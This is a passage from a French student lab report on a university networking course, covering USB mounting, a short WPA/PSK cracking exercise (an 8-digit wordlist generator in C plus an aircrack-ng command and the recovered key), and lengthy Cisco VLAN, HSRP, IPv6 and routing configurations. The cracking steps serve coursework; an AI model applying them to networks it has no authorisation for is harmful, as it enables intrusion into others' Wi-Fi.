On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
